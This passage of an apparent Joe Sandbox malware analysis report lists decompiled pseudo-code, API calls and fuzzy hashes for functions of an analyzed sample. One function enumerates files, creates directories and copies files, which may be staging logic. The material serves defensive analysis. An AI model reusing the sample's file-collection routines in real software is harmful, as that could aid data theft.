                                                                                  • Part of subcall function 0041763D: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004176E8
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$System$H_prolog3H_prolog3_InformationIos_base_dtorLocalSpecificZone_memmovestd::ios_base::_
                                                                                • String ID: UTC
                                                                                • API String ID: 2104780860-2754919731
                                                                                • Opcode ID: 2b5c51dd0cb76299a83b3b73ba0e78ede8987fb0b161ca3235cabd309edd8f87
                                                                                • Instruction ID: 79ae3abbe5da33ca35b55944848f1912cf5119d12d142dfd83bc0a7e8e7fe170
                                                                                • Opcode Fuzzy Hash: 2b5c51dd0cb76299a83b3b73ba0e78ede8987fb0b161ca3235cabd309edd8f87
                                                                                • Instruction Fuzzy Hash: 9E115E71901618BFDB54DBE4DE49BCEB7B8AF18304F5004A6F244F6050DBB85E888B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E0042382C(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                				void* __ebp;
                                                                                				intOrPtr _t19;
                                                                                				void* _t21;
                                                                                				void* _t22;
                                                                                				void* _t24;
                                                                                				intOrPtr* _t25;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                
                                                                                				_t26 = __esi;
                                                                                				_t25 = __edi;
                                                                                				_t22 = __ecx;
                                                                                				_t21 = __ebx;
                                                                                				_t29 = _a20;
                                                                                				if(_a20 != 0) {
                                                                                					_push(_a20);
                                                                                					_push(__ebx);
                                                                                					_push(__esi);
                                                                                					_push(_a4);
                                                                                					E0042379A(__ebx, __edi, __esi, _t29);
                                                                                					_t27 = _t27 + 0x10;
                                                                                				}
                                                                                				_t30 = _a28;
                                                                                				_push(_a4);
                                                                                				if(_a28 != 0) {
                                                                                					_push(_a28);
                                                                                				} else {
                                                                                					_push(_t26);
                                                                                				}
                                                                                				E004215CA(_t22);
                                                                                				_push( *_t25);
                                                                                				_push(_a16);
                                                                                				_push(_a12);
                                                                                				_push(_t26);
                                                                                				E0042320B(_t21, _t24, _t25, _t26, _t30);
                                                                                				_push(0x100);
                                                                                				_push(_a24);
                                                                                				_t19 =  *((intOrPtr*)(_t25 + 4)) + 1;
                                                                                				_push(_a16);
                                                                                				 *((intOrPtr*)(_t26 + 8)) = _t19;
                                                                                				_push(_a8);
                                                                                				_push(_t26);
                                                                                				_push(_a4);
                                                                                				"j,hh=D"();
                                                                                				if(_t19 != 0) {
                                                                                					E00421591(_t19, _t26);
                                                                                					return _t19;
                                                                                				}
                                                                                				return _t19;
                                                                                			}











                                                                                0x0042382c
                                                                                0x0042382c
                                                                                0x0042382c
                                                                                0x0042382c
                                                                                0x00423831
                                                                                0x00423835
                                                                                0x00423837
                                                                                0x0042383a
                                                                                0x0042383b
                                                                                0x0042383c
                                                                                0x0042383f
                                                                                0x00423844
                                                                                0x00423844
                                                                                0x00423847
                                                                                0x0042384b
                                                                                0x0042384e
                                                                                0x00423853
                                                                                0x00423850
                                                                                0x00423850
                                                                                0x00423850
                                                                                0x00423856
                                                                                0x0042385b
                                                                                0x0042385d
                                                                                0x00423860
                                                                                0x00423863
                                                                                0x00423864
                                                                                0x0042386c
                                                                                0x00423871
                                                                                0x00423874
                                                                                0x00423875
                                                                                0x00423878
                                                                                0x0042387b
                                                                                0x00423881
                                                                                0x00423882
                                                                                0x00423885
                                                                                0x0042388f
                                                                                0x00423893
                                                                                0x00000000
                                                                                0x00423893
                                                                                0x00423899

                                                                                APIs
                                                                                • ___BuildCatchObject.LIBCMT ref: 0042383F
                                                                                  • Part of subcall function 0042379A: ___BuildCatchObjectHelper.LIBCMT ref: 004237D0
                                                                                • _UnwindNestedFrames.LIBCMT ref: 00423856
                                                                                • ___FrameUnwindToState.LIBCMT ref: 00423864
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                • String ID: csm$csm
                                                                                • API String ID: 2163707966-3733052814
                                                                                • Opcode ID: 8b349ed66390314bf91fe942f820b866e1998406d2e9b45cbdcd93026cfd71a0
                                                                                • Instruction ID: 4b18216ae2ef9fac6165bc63aef4e8a25615c986ef91649751fd0c435c27fc7a
                                                                                • Opcode Fuzzy Hash: 8b349ed66390314bf91fe942f820b866e1998406d2e9b45cbdcd93026cfd71a0
                                                                                • Instruction Fuzzy Hash: 89012871100129BBCF126F51EC45EAA3FBAEF18359F40405AFD1918121D73ADAA1DBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00419390(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t34;
                                                                                				intOrPtr* _t38;
                                                                                				intOrPtr _t40;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                
                                                                                				_t42 = __eflags;
                                                                                				_push(4);
                                                                                				E004219A8(E00435B25, __ebx, __edi, __esi);
                                                                                				_t40 =  *((intOrPtr*)(_t41 + 8));
                                                                                				_t38 = E00420F19(__ebx, _t40, _t42);
                                                                                				 *((intOrPtr*)(_t40 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t40 + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t40 + 0x14)) = 0;
                                                                                				 *((intOrPtr*)(_t41 - 4)) = 0;
                                                                                				E0041DDAE();
                                                                                				 *((intOrPtr*)(_t40 + 8)) = E00419445(0x43e028);
                                                                                				E0041DDAE();
                                                                                				 *((intOrPtr*)(_t40 + 0x10)) = E00419445("false");
                                                                                				E0041DDAE();
                                                                                				 *((intOrPtr*)(_t40 + 0x14)) = E00419445("true");
                                                                                				E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xc)) =  *((intOrPtr*)( *_t38));
                                                                                				E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xd)) =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
                                                                                				E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xc)) = 0x2e;
                                                                                				_t34 = E0041DDAE();
                                                                                				 *((char*)(_t40 + 0xd)) = 0x2c;
                                                                                				return E00421A4D(_t34);
                                                                                			}








                                                                                0x00419390
                                                                                0x00419390
                                                                                0x00419397
                                                                                0x0041939c
                                                                                0x004193a4
                                                                                0x004193a8
                                                                                0x004193ab
                                                                                0x004193ae
                                                                                0x004193b1
                                                                                0x004193b4
                                                                                0x004193c3
                                                                                0x004193c6
                                                                                0x004193d5
                                                                                0x004193d8
                                                                                0x004193e7
                                                                                0x004193ea
                                                                                0x004193f3
                                                                                0x004193f6
                                                                                0x00419400
                                                                                0x00419403
                                                                                0x00419408
                                                                                0x0041940c
                                                                                0x00419411
                                                                                0x0041941a

                                                                                APIs
                                                                                • __EH_prolog3_catch.LIBCMT ref: 00419397
                                                                                • _localeconv.LIBCMT ref: 0041939F
                                                                                  • Part of subcall function 00420F19: __getptd.LIBCMT ref: 00420F19
                                                                                  • Part of subcall function 0041DDAE: ____lc_handle_func.LIBCMT ref: 0041DDB1
                                                                                  • Part of subcall function 0041DDAE: ____lc_codepage_func.LIBCMT ref: 0041DDB9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_catch____lc_codepage_func____lc_handle_func__getptd_localeconv
                                                                                • String ID: (C$false$true
                                                                                • API String ID: 2930029256-1123413311
                                                                                • Opcode ID: a0c01fab142c24493b514f8d9614e3c289579df7f84627c123770faac48ee8f9
                                                                                • Instruction ID: 753a31a21249a0a8cf25c30170d939246f296a6dd162e783afc48056f5a63359
                                                                                • Opcode Fuzzy Hash: a0c01fab142c24493b514f8d9614e3c289579df7f84627c123770faac48ee8f9
                                                                                • Instruction Fuzzy Hash: B801E1B4E157408EC760FF7A9005249BBE06F95308B04C96FE1998B753DB7CE584CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E00417319(void* __eax, void* __eflags) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t11;
                                                                                				void* _t14;
                                                                                				signed int _t17;
                                                                                				void* _t18;
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				CHAR* _t22;
                                                                                				void* _t23;
                                                                                
                                                                                				_t20 = __eax;
                                                                                				_t22 = E0041E042(_t18, __eax, _t21, __eax);
                                                                                				 *_t22 = 0;
                                                                                				E0041F58A(GetTickCount());
                                                                                				_t14 = 0;
                                                                                				_t25 = _t20;
                                                                                				if(_t20 > 0) {
                                                                                					_t14 = _t20;
                                                                                					do {
                                                                                						_t11 = E0041F59C(_t25);
                                                                                						_t17 = 0xa;
                                                                                						asm("cdq");
                                                                                						wsprintfA(_t22, "%s%d", _t22, _t11 % _t17);
                                                                                						_t23 = _t23 + 0x10;
                                                                                						_t20 = _t20 - 1;
                                                                                					} while (_t20 != 0);
                                                                                				}
                                                                                				 *((char*)(_t14 + _t22)) = 0;
                                                                                				return _t22;
                                                                                			}













                                                                                0x0041731c
                                                                                0x00417324
                                                                                0x00417327
                                                                                0x00417331
                                                                                0x00417336
                                                                                0x00417339
                                                                                0x0041733b
                                                                                0x0041733d
                                                                                0x0041733f
                                                                                0x0041733f
                                                                                0x00417346
                                                                                0x00417347
                                                                                0x00417352
                                                                                0x00417358
                                                                                0x0041735b
                                                                                0x0041735b
                                                                                0x0041733f
                                                                                0x0041735f
                                                                                0x00417367

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0041731F
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • GetTickCount.KERNEL32 ref: 0041732A
                                                                                  • Part of subcall function 0041F58A: __getptd.LIBCMT ref: 0041F58F
                                                                                • _rand.LIBCMT ref: 0041733F
                                                                                  • Part of subcall function 0041F59C: __getptd.LIBCMT ref: 0041F59C
                                                                                • wsprintfA.USER32 ref: 00417352
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                                                                • String ID: %s%d
                                                                                • API String ID: 2840978672-1110647743
                                                                                • Opcode ID: 7c5257040d14f007887309139704f93e4cf48fbfb5f3b41ac1871a356a95beb8
                                                                                • Instruction ID: 9f988e68ebd4aa8a26a65c89bd4f648a6c9477fe81a95545e8e146a011f54420
                                                                                • Opcode Fuzzy Hash: 7c5257040d14f007887309139704f93e4cf48fbfb5f3b41ac1871a356a95beb8
                                                                                • Instruction Fuzzy Hash: 23E02B323456503AE3252BAE5C49BBB9E69DFC6765F24006FF944C6283DDEC4C8142B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00C716B7
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00C716D4
                                                                                  • Part of subcall function 00C71629: std::runtime_error::runtime_error.LIBCPMTD ref: 00C71634
                                                                                • __CxxThrowException@8.LIBCMT ref: 00C716E2
                                                                                  • Part of subcall function 00C733AB: RaiseException.KERNEL32(?,?,00C7316D,00C71293,?,?,?,?,00C7316D,00C71293,00DAB120,00DAD428,00C71293,00000000,00000000), ref: 00C733ED
                                                                                • std::runtime_error::runtime_error.LIBCPMTD ref: 00C716F3
                                                                                  • Part of subcall function 00C63D70: std::exception::exception.LIBCMT ref: 00C63D9D
                                                                                Strings
                                                                                • invalid string position, xrefs: 00C716BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: std::runtime_error::runtime_error$ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: invalid string position
                                                                                • API String ID: 4027220959-1799206989
                                                                                • Opcode ID: 3242aee3339f8e56ff74d93fa398ecdc6fd10b2dac0cfcc0411992ae57bfbb82
                                                                                • Instruction ID: c19281194a31d43fcf3f8a2a16e27ee741ecf59c9452c8ccdd13b65ce937eb20
                                                                                • Opcode Fuzzy Hash: 3242aee3339f8e56ff74d93fa398ecdc6fd10b2dac0cfcc0411992ae57bfbb82
                                                                                • Instruction Fuzzy Hash: 0FF09B7660025C67CB20EBD4DC86EDEB77CEF44761F184425F604A7541DFB19A04E7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00C7BD2D
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C7BD3E
                                                                                • __getptd.LIBCMT ref: 00C7BD4C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: MOC$csm
                                                                                • API String ID: 803148776-1389381023
                                                                                • Opcode ID: d5b26452f1acb593a333f25b930e2cfa0d182143386c67c8b284165417fe066f
                                                                                • Instruction ID: 7f8a87741151b5778b6f0dee6e4e18001c7857d1529d8b25d05a9c0d165c3ea4
                                                                                • Opcode Fuzzy Hash: d5b26452f1acb593a333f25b930e2cfa0d182143386c67c8b284165417fe066f
                                                                                • Instruction Fuzzy Hash: 77E04F351041088FDF20EB68C14BB283794EF98314F5586A1E80CC7323E734DD40AA52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E0040D762(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t141;
                                                                                				intOrPtr _t145;
                                                                                				void* _t164;
                                                                                				void* _t171;
                                                                                				void* _t176;
                                                                                				WCHAR* _t177;
                                                                                				signed char _t178;
                                                                                				void* _t184;
                                                                                				CHAR* _t185;
                                                                                				void* _t191;
                                                                                				void* _t198;
                                                                                				void* _t208;
                                                                                				WCHAR* _t209;
                                                                                				intOrPtr _t235;
                                                                                				intOrPtr _t281;
                                                                                				intOrPtr _t286;
                                                                                				WCHAR* _t293;
                                                                                				void* _t303;
                                                                                				void* _t304;
                                                                                				intOrPtr _t305;
                                                                                				intOrPtr _t313;
                                                                                
                                                                                				_t285 = __esi;
                                                                                				_t273 = __edi;
                                                                                				_t224 = __ebx;
                                                                                				_push(0x200);
                                                                                				E004219DE(E00437044, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t303 - 0x1f8)) =  *((intOrPtr*)(_t303 + 8));
                                                                                				 *((intOrPtr*)(_t303 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t303 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t303 - 0x1c)) = 0;
                                                                                				 *((char*)(_t303 - 0x2c)) = 0;
                                                                                				 *((char*)(_t303 - 4)) = 3;
                                                                                				_t307 =  *((intOrPtr*)(_t303 + 0xc));
                                                                                				if( *((intOrPtr*)(_t303 + 0xc)) == 0) {
                                                                                					_push( *0x449ea8);
                                                                                				} else {
                                                                                					_push( *0x449e58);
                                                                                				}
                                                                                				E0040381A(_t303 - 0x2c, E0041F644(_t224, _t273, _t285, _t307));
                                                                                				_push(_t303 - 0x2c);
                                                                                				_push(_t303 - 0x10c);
                                                                                				_t274 = _t303 + 0x10;
                                                                                				_t141 = E0040E2D6(_t224, _t303 + 0x10, _t285, _t307);
                                                                                				_t305 = _t304 - 0x14;
                                                                                				 *((char*)(_t303 - 4)) = 4;
                                                                                				_t272 = _t303 + 0x48;
                                                                                				 *((intOrPtr*)(_t303 - 0x1fc)) = _t305;
                                                                                				E0040D39B(_t141, _t141, _t305, _t303 + 0x48);
                                                                                				E0041778D(_t303 - 0x20c, _t303 + 0x10, _t285, _t307);
                                                                                				_t286 = 0;
                                                                                				 *((char*)(_t303 - 4)) = 6;
                                                                                				E00402C34(_t303 - 0x10c, 1, 0);
                                                                                				_t145 =  *((intOrPtr*)(_t303 - 0x208));
                                                                                				_t235 =  *((intOrPtr*)(_t303 - 0x20c));
                                                                                				 *((intOrPtr*)(_t303 - 0x1fc)) = _t145;
                                                                                				 *((intOrPtr*)(_t303 - 0x1f4)) = _t235;
                                                                                				_t308 = _t235 - _t145;
                                                                                				if(_t235 != _t145) {
                                                                                					do {
                                                                                						E0040E243(_t303 - 0x48,  *((intOrPtr*)(_t303 - 0x1f4)));
                                                                                						 *((char*)(_t303 - 4)) = 7;
                                                                                						 *(_t303 - 0x1f0) = E00417554(_t303 - 0x48, _t272, _t303 - 0x160);
                                                                                						_push(_t303 - 0x2c);
                                                                                						_push(_t303 - 0xf0);
                                                                                						 *((char*)(_t303 - 4)) = 8;
                                                                                						E0040E2D6(1, _t303 + 0x10, _t286, _t308);
                                                                                						 *((char*)(_t303 - 4)) = 9;
                                                                                						_t164 = E0040D431( *(_t303 - 0x1f0), _t303 - 0x1b4);
                                                                                						 *((char*)(_t303 - 4)) = 0xa;
                                                                                						 *((intOrPtr*)(_t303 - 0x8c)) = _t286;
                                                                                						 *((intOrPtr*)(_t303 - 0x88)) = 0xf;
                                                                                						 *((char*)(_t303 - 0x9c)) = 0;
                                                                                						E0040CFB8(_t303 - 0x9c, _t164);
                                                                                						E00402C34(_t303 - 0x1b4, 1, 0);
                                                                                						E00402C34(_t303 - 0xf0, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 0xe;
                                                                                						E00402C34(_t303 - 0x160, 1, 0);
                                                                                						_t171 = E00417554(_t303 - 0x48, _t272, _t303 - 0x80);
                                                                                						_push(_t303 - 0x2c);
                                                                                						_push(_t303 - 0x64);
                                                                                						 *((char*)(_t303 - 4)) = 0xf;
                                                                                						E0040E2D6(1, _t303 + 0x10, _t171, _t308);
                                                                                						 *((char*)(_t303 - 4)) = 0x10;
                                                                                						_t176 = E0040D431(_t171, _t303 - 0xb8);
                                                                                						 *((char*)(_t303 - 4)) = 0x11;
                                                                                						_t177 = E004175C4(_t176, _t303 - 0xd4);
                                                                                						if(_t177[0xa] >= 8) {
                                                                                							_t177 =  *_t177;
                                                                                						}
                                                                                						_t178 = GetFileAttributesW(_t177);
                                                                                						if(_t178 == 0xffffffff || (_t178 & 0x00000010) != 0) {
                                                                                							_t59 = _t303 - 0x1f0;
                                                                                							 *_t59 =  *(_t303 - 0x1f0) & 0x00000000;
                                                                                							__eflags =  *_t59;
                                                                                						} else {
                                                                                							 *(_t303 - 0x1f0) = 1;
                                                                                						}
                                                                                						E00403960(0, _t303 - 0xd4, 1);
                                                                                						E00402C34(_t303 - 0xb8, 1, 0);
                                                                                						E00402C34(_t303 - 0x64, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 0xe;
                                                                                						E00402C34(_t303 - 0x80, 1, 0);
                                                                                						_t281 =  *((intOrPtr*)(_t303 - 0x1f8));
                                                                                						if( *(_t303 - 0x1f0) != 0) {
                                                                                							_t68 = _t281 + 0x1c;
                                                                                							 *_t68 =  *((intOrPtr*)(_t281 + 0x1c)) + 1;
                                                                                							_t313 =  *_t68;
                                                                                						}
                                                                                						_push("\\");
                                                                                						_push(_t303 - 0x64);
                                                                                						_t184 = E0040D337(1, _t281, 0, _t313);
                                                                                						 *((char*)(_t303 - 4)) = 0x12;
                                                                                						_t185 = E0040D39B(_t184, _t184, _t303 - 0x80, _t303 + 0x2c);
                                                                                						_t305 = _t305 + 0x10;
                                                                                						_t314 = _t185[0x14] - 0x10;
                                                                                						if(_t185[0x14] >= 0x10) {
                                                                                							_t185 =  *_t185;
                                                                                						}
                                                                                						CreateDirectoryA(_t185, 0);
                                                                                						E00402C34(_t303 - 0x80, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 0xe;
                                                                                						E00402C34(_t303 - 0x64, 1, 0);
                                                                                						_t191 = E004175C4(_t303 + 0x2c, _t303 - 0x128);
                                                                                						 *((char*)(_t303 - 4)) = 0x13;
                                                                                						E004175C4(_t281, _t303 - 0x17c);
                                                                                						 *((char*)(_t303 - 4)) = 0x14;
                                                                                						E0040E32E(_t272);
                                                                                						_t272 = _t303 - 0x1d0;
                                                                                						 *((char*)(_t303 - 4)) = 0x15;
                                                                                						E0040E34B(_t191, _t303 - 0x1d0);
                                                                                						 *((char*)(_t303 - 4)) = 0x16;
                                                                                						_t198 = E0040E32E(_t303 - 0x1d0);
                                                                                						 *((char*)(_t303 - 4)) = 0x17;
                                                                                						_t293 = E0040E2B0(_t303 - 0x144, _t303 - 0x48, _t198, _t303 - 0x48);
                                                                                						 *((char*)(_t303 - 4)) = 0x18;
                                                                                						 *(_t303 - 0x1f0) = E00417554(_t303 - 0x48, _t303 - 0x1d0, _t303 - 0xd4);
                                                                                						_push(_t303 - 0x2c);
                                                                                						_push(_t303 - 0xb8);
                                                                                						 *((char*)(_t303 - 4)) = 0x19;
                                                                                						E0040E2D6(1, _t303 + 0x10, _t293, _t314);
                                                                                						 *((char*)(_t303 - 4)) = 0x1a;
                                                                                						_t208 = E0040D431( *(_t303 - 0x1f0), _t303 - 0x64);
                                                                                						 *((char*)(_t303 - 4)) = 0x1b;
                                                                                						_t209 = E004175C4(_t208, _t303 - 0x80);
                                                                                						if(_t293[0xa] >= 8) {
                                                                                							_t293 =  *_t293;
                                                                                						}
                                                                                						if(_t209[0xa] >= 8) {
                                                                                							_t209 =  *_t209;
                                                                                						}
                                                                                						CopyFileW(_t209, _t293, 1);
                                                                                						_t274 = 0;
                                                                                						E00403960(0, _t303 - 0x80, 1);
                                                                                						E00402C34(_t303 - 0x64, 1, 0);
                                                                                						E00402C34(_t303 - 0xb8, 1, 0);
                                                                                						E00402C34(_t303 - 0xd4, 1, 0);
                                                                                						E00403960(0, _t303 - 0x144, 1);
                                                                                						E00403960(0, _t303 - 0x198, 1);
                                                                                						E00403960(0, _t303 - 0x1d0, 1);
                                                                                						E00403960(0, _t303 - 0x1ec, 1);
                                                                                						E00403960(0, _t303 - 0x17c, 1);
                                                                                						E00403960(0, _t303 - 0x128, 1);
                                                                                						E00402C34(_t303 - 0x9c, 1, 0);
                                                                                						 *((char*)(_t303 - 4)) = 6;
                                                                                						E00403960(0, _t303 - 0x48, 1);
                                                                                						 *((intOrPtr*)(_t303 - 0x1f4)) =  *((intOrPtr*)(_t303 - 0x1f4)) + 0x1c;
                                                                                						_t286 = 0;
                                                                                					} while ( *((intOrPtr*)(_t303 - 0x1f4)) !=  *((intOrPtr*)(_t303 - 0x1fc)));
                                                                                				}
                                                                                				_t146 =  *((intOrPtr*)(_t303 - 0x20c));
                                                                                				if( *((intOrPtr*)(_t303 - 0x20c)) != _t286) {
                                                                                					E0040E28F(_t146,  *((intOrPtr*)(_t303 - 0x208)));
                                                                                					_push( *((intOrPtr*)(_t303 - 0x20c)));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				 *((intOrPtr*)(_t303 - 0x20c)) = _t286;
                                                                                				 *((intOrPtr*)(_t303 - 0x208)) = _t286;
                                                                                				 *((intOrPtr*)(_t303 - 0x204)) = _t286;
                                                                                				E00402C34(_t303 - 0x2c, 1, _t286);
                                                                                				E00402C34(_t303 + 0x10, 1, _t286);
                                                                                				E00402C34(_t303 + 0x2c, 1, _t286);
                                                                                				E00402C34(_t303 + 0x48, 1, _t286);
                                                                                				return E00421A61(1, _t274, _t286);
                                                                                			}
























                                                                                0x0040d762
                                                                                0x0040d762
                                                                                0x0040d762
                                                                                0x0040d762
                                                                                0x0040d76c
                                                                                0x0040d774
                                                                                0x0040d77c
                                                                                0x0040d77f
                                                                                0x0040d786
                                                                                0x0040d789
                                                                                0x0040d78c
                                                                                0x0040d790
                                                                                0x0040d793
                                                                                0x0040d79d
                                                                                0x0040d795
                                                                                0x0040d795
                                                                                0x0040d795
                                                                                0x0040d7ad
                                                                                0x0040d7b5
                                                                                0x0040d7bc
                                                                                0x0040d7bd
                                                                                0x0040d7c0
                                                                                0x0040d7c5
                                                                                0x0040d7c8
                                                                                0x0040d7ce
                                                                                0x0040d7d1
                                                                                0x0040d7db
                                                                                0x0040d7e8
                                                                                0x0040d7ed
                                                                                0x0040d7fa
                                                                                0x0040d7fe
                                                                                0x0040d803
                                                                                0x0040d809
                                                                                0x0040d80f
                                                                                0x0040d815
                                                                                0x0040d81b
                                                                                0x0040d81d
                                                                                0x0040d823
                                                                                0x0040d82c
                                                                                0x0040d83b
                                                                                0x0040d844
                                                                                0x0040d84d
                                                                                0x0040d854
                                                                                0x0040d858
                                                                                0x0040d85c
                                                                                0x0040d871
                                                                                0x0040d875
                                                                                0x0040d87a
                                                                                0x0040d87e
                                                                                0x0040d88c
                                                                                0x0040d896
                                                                                0x0040d89d
                                                                                0x0040d8ac
                                                                                0x0040d8b9
                                                                                0x0040d8c6
                                                                                0x0040d8ca
                                                                                0x0040d8d6
                                                                                0x0040d8e0
                                                                                0x0040d8e4
                                                                                0x0040d8e8
                                                                                0x0040d8ec
                                                                                0x0040d8fd
                                                                                0x0040d901
                                                                                0x0040d90d
                                                                                0x0040d911
                                                                                0x0040d91a
                                                                                0x0040d91c
                                                                                0x0040d91c
                                                                                0x0040d91f
                                                                                0x0040d928
                                                                                0x0040d936
                                                                                0x0040d936
                                                                                0x0040d936
                                                                                0x0040d92e
                                                                                0x0040d92e
                                                                                0x0040d92e
                                                                                0x0040d946
                                                                                0x0040d955
                                                                                0x0040d95f
                                                                                0x0040d969
                                                                                0x0040d96d
